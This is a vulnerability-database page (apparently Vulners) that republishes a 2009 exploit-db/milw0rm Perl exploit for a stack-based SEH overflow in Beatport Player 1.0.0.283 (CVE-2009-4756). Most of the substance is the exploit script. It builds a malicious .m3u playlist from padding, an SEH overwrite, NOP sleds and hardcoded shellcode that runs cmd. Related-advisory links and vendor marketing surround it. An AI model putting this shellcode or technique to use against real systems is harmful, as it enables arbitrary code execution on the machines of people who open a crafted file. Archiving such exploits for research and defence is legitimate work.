Lucene search
+L

Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (3)

🗓️ 01 May 2009 00:00:00Reported by StackType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploi

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-4756
1 May 200900:00
circl
cve
CVE
CVE-2009-4756
29 Mar 201018:00
cve
cvelist
Cvelist
CVE-2009-4756
29 Mar 201018:00
cvelist
exploitdb
Exploit DB
Beatport Player 1.0.0.283 - '.m3u' Local Buffer Overflow (PoC)
1 May 200900:00
exploitdb
exploitdb
Exploit DB
Beatport Player 1.0.0.283 - '.m3u' Local Overwrite (SEH)
1 May 200900:00
exploitdb
exploitdb
Exploit DB
Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (2)
1 May 200900:00
exploitdb
nvd
NVD
CVE-2009-4756
29 Mar 201018:30
nvd
openvas
OpenVAS
Beatport Player '.m3u' File Buffer Overflow Vulnerability
7 Apr 201000:00
openvas
openvas
OpenVAS
Beatport Player '.m3u' File Buffer Overflow Vulnerability
7 Apr 201000:00
openvas
prion
Prion
Stack overflow
29 Mar 201018:30
prion
 #!/usr/bin/perl
# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)
# Work Only in WIN SP2 FR
# Credit to SirGod The Discover
# Stack The exploiter
# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d
# After exec the exploit wait some sec for see the cmd executed :d
use strict;
use warnings;
# win32_exec -  EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078
my $shellcode =
"\x8B\xEC\x33\xFF\x57".
"\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64".
"\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93".
"\xBF\x77\xFF\xD0";
my $junk = "\x41" x 1232;
my $next_seh="\xeb\x06\x90\x90";
my $seh  = "\x44\x25\xD1\x72"; #
my $nops = "\x90" x 4;
my $nopsled = "\x90" x 20;
open(my $playlist, "> seh_exploit.m3u");
print $playlist
                    $junk.$next_seh.$seh.$nops.$shellcode.$nopsled.
                    "\r\n";
close $playlist;

# milw0rm.com [2009-05-01]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 May 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.06913
39